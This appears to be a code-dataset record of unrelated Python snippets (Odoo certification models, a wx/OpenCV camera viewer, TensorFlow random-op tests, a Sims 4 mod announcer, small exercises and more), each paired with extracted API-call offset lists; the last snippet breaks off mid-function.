[((1711, 1733), 'numpy.linalg.pinv', 'np.linalg.pinv', (['self.P'], {}), '(self.P)\n', (1725, 1733), True, 'import numpy as np\n'), ((1560, 1589), 'numpy.hstack', 'np.hstack', (['[self._R, self._t]'], {}), '([self._R, self._t])\n', (1569, 1589), True, 'import numpy as np\n'), ((1263, 1284), 'numpy.linalg.inv', 'np.linalg.inv', (['self.R'], {}), '(self.R)\n', (1276, 1284), True, 'import numpy as np\n')]
|
SRC = """
---
- - college
- -380608299.3165369
- closely: 595052867
born: false
stomach: true
expression: true
chosen: 34749965
somebody: false
- positive
- true
- false
- price
- 2018186817
- average
- young
- -1447308110
"""
import ryaml
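# Micro-benchmark: parse the same YAML document 1000 times with ryaml.loads.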
for _ in range(1000):
ryaml.loads(SRC)
|
[
"ryaml.loads"
] |
[((299, 315), 'ryaml.loads', 'ryaml.loads', (['SRC'], {}), '(SRC)\n', (310, 315), False, 'import ryaml\n')]
|
# -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
from odoo import api, fields, models
class SlidePartnerRelation(models.Model):
_inherit = 'slide.slide.partner'
user_input_ids = fields.One2many('survey.user_input', 'slide_partner_id', 'Certification attempts')
survey_quizz_passed = fields.Boolean('Certification Quizz Passed', compute='_compute_survey_quizz_passed', store=True)
@api.depends('partner_id', 'user_input_ids.quizz_passed')
def _compute_survey_quizz_passed(self):
passed_user_inputs = self.env['survey.user_input'].sudo().search([
('slide_partner_id', 'in', self.ids),
('quizz_passed', '=', True)
])
passed_slide_partners = passed_user_inputs.mapped('slide_partner_id')
for record in self:
record.survey_quizz_passed = record in passed_slide_partners
@api.model_create_multi
def create(self, vals_list):
res = super(SlidePartnerRelation, self).create(vals_list)
completed = res.filtered('survey_quizz_passed')
if completed:
completed.write({'completed': True})
return res
def _write(self, vals):
res = super(SlidePartnerRelation, self)._write(vals)
if vals.get('survey_quizz_passed'):
self.sudo().write({'completed': True})
return res
class Slide(models.Model):
_inherit = 'slide.slide'
slide_type = fields.Selection(selection_add=[('certification', 'Certification')])
survey_id = fields.Many2one('survey.survey', 'Certification')
nbr_certification = fields.Integer("Number of Certifications", compute='_compute_slides_statistics', store=True)
_sql_constraints = [
('check_survey_id', "CHECK(slide_type != 'certification' OR survey_id IS NOT NULL)", "A slide of type 'certification' requires a certification."),
('check_certification_preview', "CHECK(slide_type != 'certification' OR is_preview = False)", "A slide of type certification cannot be previewed."),
]
@api.onchange('survey_id')
def _on_change_survey_id(self):
if self.survey_id:
self.slide_type = 'certification'
@api.model
def create(self, values):
rec = super(Slide, self).create(values)
if rec.survey_id:
rec.slide_type = 'certification'
return rec
def _generate_certification_url(self):
""" get a map of certification url for certification slide from `self`. The url will come from the survey user input:
1/ existing and not done user_input for member of the course
2/ create a new user_input for member
3/ for no member, a test user_input is created and the url is returned
Note: the slide.slides.partner should already exist
We have to generate a new invite_token to differentiate pools of attempts since the
course can be enrolled multiple times.
"""
certification_urls = {}
for slide in self.filtered(lambda slide: slide.slide_type == 'certification' and slide.survey_id):
if slide.channel_id.is_member:
user_membership_id_sudo = slide.user_membership_id.sudo()
if user_membership_id_sudo.user_input_ids:
last_user_input = next(user_input for user_input in user_membership_id_sudo.user_input_ids.sorted(
lambda user_input: user_input.create_date, reverse=True
))
certification_urls[slide.id] = last_user_input._get_survey_url()
else:
user_input = slide.survey_id.sudo()._create_answer(
partner=self.env.user.partner_id,
check_attempts=False,
**{
'slide_id': slide.id,
'slide_partner_id': user_membership_id_sudo.id
},
invite_token=self.env['survey.user_input']._generate_invite_token()
)
certification_urls[slide.id] = user_input._get_survey_url()
else:
user_input = slide.survey_id.sudo()._create_answer(
partner=self.env.user.partner_id,
check_attempts=False,
test_entry=True, **{
'slide_id': slide.id
}
)
certification_urls[slide.id] = user_input._get_survey_url()
return certification_urls
|
[
"odoo.fields.Selection",
"odoo.fields.Many2one",
"odoo.fields.Integer",
"odoo.api.onchange",
"odoo.api.depends",
"odoo.fields.One2many",
"odoo.fields.Boolean"
] |
[((240, 326), 'odoo.fields.One2many', 'fields.One2many', (['"""survey.user_input"""', '"""slide_partner_id"""', '"""Certification attempts"""'], {}), "('survey.user_input', 'slide_partner_id',\n 'Certification attempts')\n", (255, 326), False, 'from odoo import api, fields, models\n'), ((349, 450), 'odoo.fields.Boolean', 'fields.Boolean', (['"""Certification Quizz Passed"""'], {'compute': '"""_compute_survey_quizz_passed"""', 'store': '(True)'}), "('Certification Quizz Passed', compute=\n '_compute_survey_quizz_passed', store=True)\n", (363, 450), False, 'from odoo import api, fields, models\n'), ((452, 508), 'odoo.api.depends', 'api.depends', (['"""partner_id"""', '"""user_input_ids.quizz_passed"""'], {}), "('partner_id', 'user_input_ids.quizz_passed')\n", (463, 508), False, 'from odoo import api, fields, models\n'), ((1462, 1530), 'odoo.fields.Selection', 'fields.Selection', ([], {'selection_add': "[('certification', 'Certification')]"}), "(selection_add=[('certification', 'Certification')])\n", (1478, 1530), False, 'from odoo import api, fields, models\n'), ((1547, 1596), 'odoo.fields.Many2one', 'fields.Many2one', (['"""survey.survey"""', '"""Certification"""'], {}), "('survey.survey', 'Certification')\n", (1562, 1596), False, 'from odoo import api, fields, models\n'), ((1621, 1718), 'odoo.fields.Integer', 'fields.Integer', (['"""Number of Certifications"""'], {'compute': '"""_compute_slides_statistics"""', 'store': '(True)'}), "('Number of Certifications', compute=\n '_compute_slides_statistics', store=True)\n", (1635, 1718), False, 'from odoo import api, fields, models\n'), ((2064, 2089), 'odoo.api.onchange', 'api.onchange', (['"""survey_id"""'], {}), "('survey_id')\n", (2076, 2089), False, 'from odoo import api, fields, models\n')]
|
from random import randint
from time import sleep
def sorteia(lst):
print('Sorteando 5 valores da lista: ', end='')
for i in range(0, 5):
num = randint(1, 10)
lst.append(num)
print(num, end=' ')
sleep(0.5)
print('PRONTO!')
def somaPar(lst):
soma = 0
for i in lst:
if i % 2 == 0:
soma += i
print(f'Somando os valores pares de {lst}, temos {soma}')
numeros = list()
sorteia(numeros)
somaPar(numeros)
|
[
"random.randint",
"time.sleep"
] |
[((161, 175), 'random.randint', 'randint', (['(1)', '(10)'], {}), '(1, 10)\n', (168, 175), False, 'from random import randint\n'), ((236, 246), 'time.sleep', 'sleep', (['(0.5)'], {}), '(0.5)\n', (241, 246), False, 'from time import sleep\n')]
|
#! python
# -*- coding: utf-8 -*-
## import time
import wx
import cv2
import numpy as np
from mwx.controls import Param, LParam
from mwx.controls import ToggleButton, Choice
from mwx.graphman import Layer, Thread
import editor as edi
class Plugin(Layer):
"""Plugins of camera viewer
"""
menu = "Cameras"
menustr = "Camera &viewer"
camerasys = property(lambda self: self.camera_selector.value)
cameraman = property(lambda self: self.parent.require(self.camerasys))
def Init(self):
self.viewer = Thread(self)
self.button = ToggleButton(self, "View camera", icon='cam',
handler=lambda v: self.viewer.Start(self.run)
if v.IsChecked() else self.viewer.Stop())
self.rate_param = LParam('rate', (100,500,100), 500, tip="refresh speed [ms] (>= 100ms)")
self.size_param = Param('size', (128,256,512,1024), 512, tip="resizing view window (<= 1k)")
self.camera_selector = Choice(self,
choices=['JeolCamera', 'RigakuCamera'], readonly=1)
self.layout((
self.button,
),
)
self.layout((
self.rate_param,
self.size_param,
self.camera_selector,
),
title="Setting",
row=1, show=0, type='vspin', lw=40, tw=40, cw=-1
)
def init_session(self, session):
self.rate_param.value = session.get('rate')
self.size_param.value = session.get('size')
self.camera_selector.value = session.get('camera')
def save_session(self, session):
session.update({
'rate': self.rate_param.value,
'size': self.size_param.value,
'camera': self.camera_selector.value,
})
def Destroy(self):
if self.viewer.is_active:
self.viewer.Stop()
return Layer.Destroy(self)
def run(self):
try:
title = self.__module__
if not self.cameraman:
print(self.message("- Camera manager is not selected."))
return
while self.viewer.is_active:
src = edi.imconv(self.cameraman.capture())
h, w = src.shape
H = self.size_param.value
W = H * w // h
dst = cv2.resize(src, (W, H), interpolation=cv2.INTER_AREA)
## dst = cv2.cvtColor(dst, cv2.COLOR_GRAY2BGR)
                ## overlay the aiming crosshair circles onto the image using XOR
if 1:
## lines and circles with color:cyan #00c0c0
## c = (192,192,0)
c = 255
cx, cy = W//2, H//2
buf = np.zeros((H, W), dtype=dst.dtype)
## buf = np.resize(0, (H, W)).astype(dst.dtype)
cv2.line(buf, (0, cy), (W, cy), c, 1)
cv2.line(buf, (cx, 0), (cx, H), c, 1)
cv2.circle(buf, (cx, cy), cx//2, c, 1)
cv2.circle(buf, (cx, cy), cx//4, c, 1)
dst = cv2.bitwise_xor(buf, dst)
cv2.imshow(title, dst)
cv2.waitKey(self.rate_param.value)
if cv2.getWindowProperty(title, 0) < 0:
self.button.Value = False
self.viewer.Stop()
break
finally:
cv2.destroyAllWindows()
if __name__ == '__main__':
from plugins import JeolCamera, RigakuCamera
from mwx.graphman import Frame
app = wx.App()
frm = Frame(None)
frm.load_plug(__file__, show=1)
frm.load_plug(JeolCamera, show=0)
frm.load_plug(RigakuCamera, show=0)
frm.Show()
app.MainLoop()
|
[
"cv2.line",
"cv2.circle",
"cv2.bitwise_xor",
"mwx.controls.Param",
"cv2.destroyAllWindows",
"mwx.graphman.Frame",
"cv2.waitKey",
"cv2.imshow",
"mwx.controls.Choice",
"numpy.zeros",
"mwx.graphman.Layer.Destroy",
"wx.App",
"mwx.controls.LParam",
"mwx.graphman.Thread",
"cv2.getWindowProperty",
"cv2.resize"
] |
[((3655, 3663), 'wx.App', 'wx.App', ([], {}), '()\n', (3661, 3663), False, 'import wx\n'), ((3674, 3685), 'mwx.graphman.Frame', 'Frame', (['None'], {}), '(None)\n', (3679, 3685), False, 'from mwx.graphman import Frame\n'), ((542, 554), 'mwx.graphman.Thread', 'Thread', (['self'], {}), '(self)\n', (548, 554), False, 'from mwx.graphman import Layer, Thread\n'), ((791, 864), 'mwx.controls.LParam', 'LParam', (['"""rate"""', '(100, 500, 100)', '(500)'], {'tip': '"""refresh speed [ms] (>= 100ms)"""'}), "('rate', (100, 500, 100), 500, tip='refresh speed [ms] (>= 100ms)')\n", (797, 864), False, 'from mwx.controls import Param, LParam\n'), ((889, 966), 'mwx.controls.Param', 'Param', (['"""size"""', '(128, 256, 512, 1024)', '(512)'], {'tip': '"""resizing view window (<= 1k)"""'}), "('size', (128, 256, 512, 1024), 512, tip='resizing view window (<= 1k)')\n", (894, 966), False, 'from mwx.controls import Param, LParam\n'), ((1004, 1068), 'mwx.controls.Choice', 'Choice', (['self'], {'choices': "['JeolCamera', 'RigakuCamera']", 'readonly': '(1)'}), "(self, choices=['JeolCamera', 'RigakuCamera'], readonly=1)\n", (1010, 1068), False, 'from mwx.controls import ToggleButton, Choice\n'), ((1936, 1955), 'mwx.graphman.Layer.Destroy', 'Layer.Destroy', (['self'], {}), '(self)\n', (1949, 1955), False, 'from mwx.graphman import Layer, Thread\n'), ((3503, 3526), 'cv2.destroyAllWindows', 'cv2.destroyAllWindows', ([], {}), '()\n', (3524, 3526), False, 'import cv2\n'), ((2401, 2454), 'cv2.resize', 'cv2.resize', (['src', '(W, H)'], {'interpolation': 'cv2.INTER_AREA'}), '(src, (W, H), interpolation=cv2.INTER_AREA)\n', (2411, 2454), False, 'import cv2\n'), ((3216, 3238), 'cv2.imshow', 'cv2.imshow', (['title', 'dst'], {}), '(title, dst)\n', (3226, 3238), False, 'import cv2\n'), ((3255, 3289), 'cv2.waitKey', 'cv2.waitKey', (['self.rate_param.value'], {}), '(self.rate_param.value)\n', (3266, 3289), False, 'import cv2\n'), ((2795, 2828), 'numpy.zeros', 'np.zeros', (['(H, W)'], {'dtype': 'dst.dtype'}), '((H, W), dtype=dst.dtype)\n', (2803, 2828), True, 'import numpy as np\n'), ((2917, 2954), 'cv2.line', 'cv2.line', (['buf', '(0, cy)', '(W, cy)', 'c', '(1)'], {}), '(buf, (0, cy), (W, cy), c, 1)\n', (2925, 2954), False, 'import cv2\n'), ((2975, 3012), 'cv2.line', 'cv2.line', (['buf', '(cx, 0)', '(cx, H)', 'c', '(1)'], {}), '(buf, (cx, 0), (cx, H), c, 1)\n', (2983, 3012), False, 'import cv2\n'), ((3033, 3073), 'cv2.circle', 'cv2.circle', (['buf', '(cx, cy)', '(cx // 2)', 'c', '(1)'], {}), '(buf, (cx, cy), cx // 2, c, 1)\n', (3043, 3073), False, 'import cv2\n'), ((3092, 3132), 'cv2.circle', 'cv2.circle', (['buf', '(cx, cy)', '(cx // 4)', 'c', '(1)'], {}), '(buf, (cx, cy), cx // 4, c, 1)\n', (3102, 3132), False, 'import cv2\n'), ((3157, 3182), 'cv2.bitwise_xor', 'cv2.bitwise_xor', (['buf', 'dst'], {}), '(buf, dst)\n', (3172, 3182), False, 'import cv2\n'), ((3326, 3357), 'cv2.getWindowProperty', 'cv2.getWindowProperty', (['title', '(0)'], {}), '(title, 0)\n', (3347, 3357), False, 'import cv2\n')]
|
def test_ipython():
print('DATA FILE IS AVAILABLE ON drp-ued-cmp001 ONLY')
#from psana.pyalgos.generic.NDArrUtils import info_ndarr
from psana import DataSource
ds = DataSource(files='/u2/pcds/pds/ued/ueddaq02/xtc/ueddaq02-r0028-s000-c000.xtc2')
run = next(ds.runs())
det = run.Detector('epixquad')
step = next(run.steps())
evt = next(step.events())
v = det.step.value(evt)
d = det.step.docstring(evt)
detsd = run.Detector('step_docstring') #Out[6]: <psana.detector.envstore.scan_raw_2_0_0 at 0x7f1a24735c10>
detsv = run.Detector('step_value') #Out[8]: <psana.detector.envstore.scan_raw_2_0_0 at 0x7f1a0b205c10>
from psana import DataSource
ds = DataSource(exp='tmoc00118', run=123, max_events=100)
run = next(ds.runs())
det = run.Detector('tmoopal')
print('run.dsparms.det_classes dict content:\n %s' % str(run.dsparms.det_classes))
run = None
evt = None
from psana import DataSource
ds = DataSource(exp='ascdaq18', run=24, max_events=100)
print('ds.xtc_files:\n ', '\n '.join(ds.xtc_files))
for irun,run in enumerate(ds.runs()):
print('\n==== %02d run: %d exp: %s detnames: %s' % (irun, run.runnum, run.expt, ','.join(run.detnames)))
det = run.Detector('epixhr')
print('det.raw._fullname :', det.raw._fullname())
for istep,step in enumerate(run.steps()):
print('\nStep %02d' % istep, type(step), end='')
for ievt,evt in enumerate(step.events()):
if ievt>10: continue #exit('exit by number of events limit %d' % args.evtmax)
print('\n Event %02d' % (ievt))
st = evt.run().step(evt)
print('XXX dir(st):', dir(st))
|
[
"psana.DataSource"
] |
[((185, 264), 'psana.DataSource', 'DataSource', ([], {'files': '"""/u2/pcds/pds/ued/ueddaq02/xtc/ueddaq02-r0028-s000-c000.xtc2"""'}), "(files='/u2/pcds/pds/ued/ueddaq02/xtc/ueddaq02-r0028-s000-c000.xtc2')\n", (195, 264), False, 'from psana import DataSource\n'), ((710, 762), 'psana.DataSource', 'DataSource', ([], {'exp': '"""tmoc00118"""', 'run': '(123)', 'max_events': '(100)'}), "(exp='tmoc00118', run=123, max_events=100)\n", (720, 762), False, 'from psana import DataSource\n'), ((986, 1036), 'psana.DataSource', 'DataSource', ([], {'exp': '"""ascdaq18"""', 'run': '(24)', 'max_events': '(100)'}), "(exp='ascdaq18', run=24, max_events=100)\n", (996, 1036), False, 'from psana import DataSource\n')]
|
from __future__ import annotations
import typing
import clock
import zone
from NeonOcean.S4.Main import Mods, This
from NeonOcean.S4.Main.Tools import Exceptions
from protocolbuffers import FileSerialization_pb2
from server import client as clientModule
from sims4 import service_manager
from sims4.tuning import instance_manager
_announcers = list() # type: typing.List[typing.Type[Announcer]]
class Announcer:
Host = This.Mod # type: Mods.Mod
Enabled = True # type: bool
Reliable = False # type: bool # Whether the announcer will be called if the host is disabled.
	Preemptive = False # type: bool # Whether the announcement methods are called before or after the function they are announcing.
_priority = 0 # type: float # Higher priority announcers will run before lower priority ones.
def __init_subclass__ (cls, **kwargs):
SetupAnnouncer(cls)
@classmethod
def GetPriority (cls) -> float:
return cls._priority
@classmethod
def SetPriority (cls, value) -> None:
cls._priority = value
_SortAnnouncer()
@classmethod
def InstanceManagerOnStart (cls, instanceManager: instance_manager.InstanceManager) -> None:
pass
@classmethod
def InstanceManagerLoadDataIntoClassInstances (cls, instanceManager: instance_manager.InstanceManager) -> None:
pass
@classmethod
def InstanceManagerOnStop (cls, instanceManager: instance_manager.InstanceManager) -> None:
pass
@classmethod
def OnLoadingScreenAnimationFinished (cls, zoneReference: zone.Zone) -> None:
pass
@classmethod
def OnClientConnect (cls, clientReference: clientModule.Client) -> None:
pass
@classmethod
def OnClientDisconnect (cls, clientReference: clientModule.Client) -> None:
pass
@classmethod
def OnEnterMainMenu (cls) -> None:
pass
@classmethod
def ZoneLoad (cls, zoneReference: zone.Zone) -> None:
pass
@classmethod
def ZoneSave (cls, zoneReference: zone.Zone, saveSlotData: typing.Optional[FileSerialization_pb2.SaveSlotData] = None) -> None:
pass
@classmethod
def ZoneStartServices (cls, zoneReference: zone.Zone, gameplayZoneData: FileSerialization_pb2.GameplayData, saveSlotData: FileSerialization_pb2.SaveSlotData) -> None:
pass
@classmethod
def ZoneOnToreDown (cls, zoneReference: zone.Zone, clientReference: clientModule.Client) -> None:
pass
@classmethod
def ZoneUpdate (cls, zoneReference: zone.Zone, absoluteTicks: int) -> None:
pass
@classmethod
def ServiceManagerOnZoneLoad (cls, zoneManager: service_manager.ServiceManager) -> None:
pass
@classmethod
def ServiceManagerOnZoneUnload (cls, zoneManager: service_manager.ServiceManager) -> None:
pass
@classmethod
def GameClockTickGameClock (cls, gameClock: clock.GameClock, absoluteTicks: int) -> None:
pass
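# Usage sketch (the class name and priority value below are illustrative, not part of
# this module): simply subclassing Announcer is enough to register it, because
# __init_subclass__ calls SetupAnnouncer automatically.
#
# class ExampleAnnouncer(Announcer):
# 	Host = This.Mod
# 	_priority = 10
#
# 	@classmethod
# 	def ZoneLoad (cls, zoneReference) -> None:
# 		pass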
def GetAllAnnouncers () -> typing.List[typing.Type[Announcer]]:
return list(_announcers)
def SetupAnnouncer (announcer: typing.Type[Announcer]) -> None:
if not isinstance(announcer, type):
raise Exceptions.IncorrectTypeException(announcer, "announcer", (type,))
if not issubclass(announcer, Announcer):
raise Exceptions.DoesNotInheritException("announcer", (Announcer,))
if announcer in _announcers:
return
_Register(announcer)
_SortAnnouncer()
def _Register (announcer: typing.Type[Announcer]) -> None:
if not announcer in _announcers:
_announcers.append(announcer)
def _SortAnnouncer () -> None:
global _announcers
announcersCopy = _announcers.copy() # type: typing.List[typing.Type[Announcer]]
sortedAnnouncers = list()
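	# Selection sort: each pass picks the remaining announcer with the highest
	# priority (ties broken by module name, ascending) and appends it to sortedAnnouncers.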
for loopCount in range(len(announcersCopy)): # type: int
targetIndex = None # type: typing.Optional[int]
for currentIndex in range(len(announcersCopy)):
if targetIndex is None:
targetIndex = currentIndex
continue
if -announcersCopy[currentIndex].GetPriority() != -announcersCopy[targetIndex].GetPriority():
if -announcersCopy[currentIndex].GetPriority() < -announcersCopy[targetIndex].GetPriority():
targetIndex = currentIndex
continue
else:
if announcersCopy[currentIndex].__module__ < announcersCopy[targetIndex].__module__:
targetIndex = currentIndex
continue
sortedAnnouncers.append(announcersCopy[targetIndex])
announcersCopy.pop(targetIndex)
_announcers = sortedAnnouncers
|
[
"NeonOcean.S4.Main.Tools.Exceptions.DoesNotInheritException",
"NeonOcean.S4.Main.Tools.Exceptions.IncorrectTypeException"
] |
[((2936, 3002), 'NeonOcean.S4.Main.Tools.Exceptions.IncorrectTypeException', 'Exceptions.IncorrectTypeException', (['announcer', '"""announcer"""', '(type,)'], {}), "(announcer, 'announcer', (type,))\n", (2969, 3002), False, 'from NeonOcean.S4.Main.Tools import Exceptions\n'), ((3054, 3115), 'NeonOcean.S4.Main.Tools.Exceptions.DoesNotInheritException', 'Exceptions.DoesNotInheritException', (['"""announcer"""', '(Announcer,)'], {}), "('announcer', (Announcer,))\n", (3088, 3115), False, 'from NeonOcean.S4.Main.Tools import Exceptions\n')]
|
from django.db import models
class BaseManagerModel(models.Model):
@classmethod
def create(cls):
return cls.objects.create()
class TestManager(models.Manager):
def get_queryset(self):
return super(TestManager, self).get_queryset().none()
class RenameManagerModel(models.Model):
instances = models.Manager()
@classmethod
def create(cls):
return cls.instances.create()
class ReplaceManagerModel(models.Model):
objects = TestManager()
@classmethod
def create(cls):
return cls.objects.create()
class MultipleManagerModel(models.Model):
objects = models.Manager()
instances = TestManager()
@classmethod
def create(cls):
return cls.objects.create()
|
[
"django.db.models.Manager"
] |
[((328, 344), 'django.db.models.Manager', 'models.Manager', ([], {}), '()\n', (342, 344), False, 'from django.db import models\n'), ((626, 642), 'django.db.models.Manager', 'models.Manager', ([], {}), '()\n', (640, 642), False, 'from django.db import models\n')]
|
from __future__ import print_function
import tensorflow as tf
import numpy as np
import pytest
import sys
from tensorflow.python.ops import array_ops
shapes = [
(3, 4),
(50, 70, 12)
]
seed = 123
def _test_random_func(func_name, shape):
print('func_name', func_name)
func = eval(func_name)
with tf.Graph().as_default():
with tf.device('/cpu:0'):
W_t = tf.Variable(func(shape, seed=seed))
with tf.Session(config=tf.ConfigProto(log_device_placement=False)) as sess:
sess.run(tf.initialize_all_variables())
W_cpu = sess.run(W_t)
with tf.device('/gpu:0'):
W_t = tf.Variable(func(shape, seed=seed))
with tf.Session(config=tf.ConfigProto(log_device_placement=False)) as sess:
sess.run(tf.initialize_all_variables())
W_gpu = sess.run(W_t)
if np.prod(np.array(shape)) < 20:
print('W_cpu', W_cpu)
print('W_gpu', W_gpu)
else:
print('W_cpu.reshape(-1)[:20]', W_cpu.reshape(-1)[:20])
print('W_gpu.reshape(-1)[:20]', W_gpu.reshape(-1)[:20])
assert np.all(np.abs(W_cpu - W_gpu) < 1e-4)
@pytest.mark.parametrize(
'shape',
shapes)
def test_random_normal(shape):
_test_random_func('tf.random_normal', shape)
@pytest.mark.parametrize(
'shape',
shapes)
def test_random_uniform(shape):
_test_random_func('tf.random_uniform', shape)
@pytest.mark.parametrize(
'shape',
shapes)
@pytest.mark.skip(reason='Causes abort currently')
def test_truncated_normal(shape):
_test_random_func('tf.truncated_normal', shape)
if __name__ == '__main__':
if len(sys.argv) == 1:
print('Please run using py.test')
else:
eval('%s((3, 4))' % sys.argv[1])
|
[
"numpy.abs",
"tensorflow.device",
"tensorflow.ConfigProto",
"numpy.array",
"tensorflow.initialize_all_variables",
"tensorflow.Graph",
"pytest.mark.parametrize",
"pytest.mark.skip"
] |
[((1229, 1269), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""shape"""', 'shapes'], {}), "('shape', shapes)\n", (1252, 1269), False, 'import pytest\n'), ((1362, 1402), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""shape"""', 'shapes'], {}), "('shape', shapes)\n", (1385, 1402), False, 'import pytest\n'), ((1497, 1537), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""shape"""', 'shapes'], {}), "('shape', shapes)\n", (1520, 1537), False, 'import pytest\n'), ((1548, 1597), 'pytest.mark.skip', 'pytest.mark.skip', ([], {'reason': '"""Causes abort currently"""'}), "(reason='Causes abort currently')\n", (1564, 1597), False, 'import pytest\n'), ((357, 376), 'tensorflow.device', 'tf.device', (['"""/cpu:0"""'], {}), "('/cpu:0')\n", (366, 376), True, 'import tensorflow as tf\n'), ((628, 647), 'tensorflow.device', 'tf.device', (['"""/gpu:0"""'], {}), "('/gpu:0')\n", (637, 647), True, 'import tensorflow as tf\n'), ((319, 329), 'tensorflow.Graph', 'tf.Graph', ([], {}), '()\n', (327, 329), True, 'import tensorflow as tf\n'), ((546, 575), 'tensorflow.initialize_all_variables', 'tf.initialize_all_variables', ([], {}), '()\n', (573, 575), True, 'import tensorflow as tf\n'), ((817, 846), 'tensorflow.initialize_all_variables', 'tf.initialize_all_variables', ([], {}), '()\n', (844, 846), True, 'import tensorflow as tf\n'), ((909, 924), 'numpy.array', 'np.array', (['shape'], {}), '(shape)\n', (917, 924), True, 'import numpy as np\n'), ((1196, 1217), 'numpy.abs', 'np.abs', (['(W_cpu - W_gpu)'], {}), '(W_cpu - W_gpu)\n', (1202, 1217), True, 'import numpy as np\n'), ((468, 510), 'tensorflow.ConfigProto', 'tf.ConfigProto', ([], {'log_device_placement': '(False)'}), '(log_device_placement=False)\n', (482, 510), True, 'import tensorflow as tf\n'), ((739, 781), 'tensorflow.ConfigProto', 'tf.ConfigProto', ([], {'log_device_placement': '(False)'}), '(log_device_placement=False)\n', (753, 781), True, 'import tensorflow as tf\n')]
|
from sendgrid_backend.signals import sendgrid_email_sent
from django_sendgrid_tracking.mail import create_send_email
sendgrid_email_sent.connect(create_send_email)
|
[
"sendgrid_backend.signals.sendgrid_email_sent.connect"
] |
[((119, 165), 'sendgrid_backend.signals.sendgrid_email_sent.connect', 'sendgrid_email_sent.connect', (['create_send_email'], {}), '(create_send_email)\n', (146, 165), False, 'from sendgrid_backend.signals import sendgrid_email_sent\n')]
|
import os
import tempfile
from aquascope.webserver.data_access.conversions import list_of_item_dicts_to_tsv
from aquascope.webserver.data_access.storage.export import upload_export_file
def export_items(items, storage_client):
with tempfile.TemporaryDirectory() as tmpdirname:
local_filepath = os.path.join(tmpdirname, 'features.tsv')
list_of_item_dicts_to_tsv(items, local_filepath)
return upload_export_file(storage_client, local_filepath)
|
[
"aquascope.webserver.data_access.storage.export.upload_export_file",
"tempfile.TemporaryDirectory",
"os.path.join",
"aquascope.webserver.data_access.conversions.list_of_item_dicts_to_tsv"
] |
[((239, 268), 'tempfile.TemporaryDirectory', 'tempfile.TemporaryDirectory', ([], {}), '()\n', (266, 268), False, 'import tempfile\n'), ((309, 349), 'os.path.join', 'os.path.join', (['tmpdirname', '"""features.tsv"""'], {}), "(tmpdirname, 'features.tsv')\n", (321, 349), False, 'import os\n'), ((358, 406), 'aquascope.webserver.data_access.conversions.list_of_item_dicts_to_tsv', 'list_of_item_dicts_to_tsv', (['items', 'local_filepath'], {}), '(items, local_filepath)\n', (383, 406), False, 'from aquascope.webserver.data_access.conversions import list_of_item_dicts_to_tsv\n'), ((422, 472), 'aquascope.webserver.data_access.storage.export.upload_export_file', 'upload_export_file', (['storage_client', 'local_filepath'], {}), '(storage_client, local_filepath)\n', (440, 472), False, 'from aquascope.webserver.data_access.storage.export import upload_export_file\n')]
|
import sys
import os
import string
class BackwardsReader:
""" Stripped and stolen from : http://code.activestate.com/recipes/120686-read-a-text-file-backwards/ """
def readline(self):
while len(self.data) == 1 and ((self.blkcount * self.blksize) < self.size):
self.blkcount = self.blkcount + 1
line = self.data[0]
try:
self.f.seek(-self.blksize * self.blkcount, 2)
self.data = string.split(self.f.read(self.blksize) + line, '\n')
except IOError:
self.f.seek(0)
self.data = string.split(self.f.read(self.size - (self.blksize * (self.blkcount-1))) + line, '\n')
if len(self.data) == 0:
return ""
line = self.data[-1]
self.data = self.data[:-1]
return line + '\n'
def __init__(self, file, blksize=4096):
"""initialize the internal structures"""
self.size = os.stat(file)[6]
self.blksize = blksize
self.blkcount = 1
self.f = open(file, 'rb')
if self.size > self.blksize:
self.f.seek(-self.blksize * self.blkcount, 2)
self.data = string.split(self.f.read(self.blksize), '\n')
if not self.data[-1]:
self.data = self.data[:-1]
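# Usage sketch (the path below is illustrative): read a file from its last line backwards.
#   br = BackwardsReader('/tmp/example.log')
#   line = br.readline()
#   while line:
#       print(line.rstrip())
#       line = br.readline()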
|
[
"os.stat"
] |
[((857, 870), 'os.stat', 'os.stat', (['file'], {}), '(file)\n', (864, 870), False, 'import os\n')]
|
from random import choice
from time import sleep
print('Vamos jogar \033[32mJokenpô\033[m')
escolhas = ['pedra', 'papel', 'tesoura']
computador = choice(escolhas)
jogador = str(input('Já escolhi a minha opção, qual a sua jogador \033[34mdesafiante\033[m: ')).strip().lower()
while not (jogador in escolhas):
jogador = str(input('opção invalida, por favor digite outra: ')).strip().lower()
print('Jogada contabilizada, hora de saber o vencedor')
sleep(1.5)
print('\033[34mJo\033[m...')
sleep(1)
print('\033[34mKen\033[m...')
sleep(1)
print('\033[34mPô\033[m!!!')
sleep(2)
print('\033[1;31mComputador\033[m: \033[1;35m{}\033[m'.format(computador))
print('\033[1;32mJogador\033[m: \033[1;36m{}\033[m'.format(jogador))
if computador == jogador:
print('\033[1;33mEMPATE\033[m')
elif computador == 'pedra':
if jogador == 'tesoura':
print('Vitória do \033[1;31mCOMPUTADOR\033[m')
else:
print('Vitória do \033[1;34mJOGADOR DESAFIANTE\033[m')
elif computador == 'papel':
if jogador == 'tesoura':
print('Vitória do \033[1;34mJOGADOR DESAFIANTE\033[m')
else:
print('Vitória do \033[1;31mCOMPUTADOR\033[m')
elif computador == 'tesoura':
if jogador == 'pedra':
print('Vitória do \033[1;34mJOGADOR DESAFIANTE\033[m')
else:
print('Vitória do \033[31mCOMPUTADOR\033[m')
|
[
"random.choice",
"time.sleep"
] |
[((147, 163), 'random.choice', 'choice', (['escolhas'], {}), '(escolhas)\n', (153, 163), False, 'from random import choice\n'), ((450, 460), 'time.sleep', 'sleep', (['(1.5)'], {}), '(1.5)\n', (455, 460), False, 'from time import sleep\n'), ((490, 498), 'time.sleep', 'sleep', (['(1)'], {}), '(1)\n', (495, 498), False, 'from time import sleep\n'), ((529, 537), 'time.sleep', 'sleep', (['(1)'], {}), '(1)\n', (534, 537), False, 'from time import sleep\n'), ((567, 575), 'time.sleep', 'sleep', (['(2)'], {}), '(2)\n', (572, 575), False, 'from time import sleep\n')]
|
from __future__ import print_function
import inspect
import ast
import sys
import collections
import weakref
def qualname(obj):
"""
Lookup or compute the ``__qualname__`` of ``obj``
:param obj: class or function to lookup
:return: ``__qualname__`` of ``obj``
:rtype: str
:raises: AttributeError if no ``__qualname__`` can be found
"""
# only compute qualname if not present already
try:
return obj.__qualname__
except AttributeError as err:
no_qualname_exception = err
obj = getattr(obj, '__func__', obj)
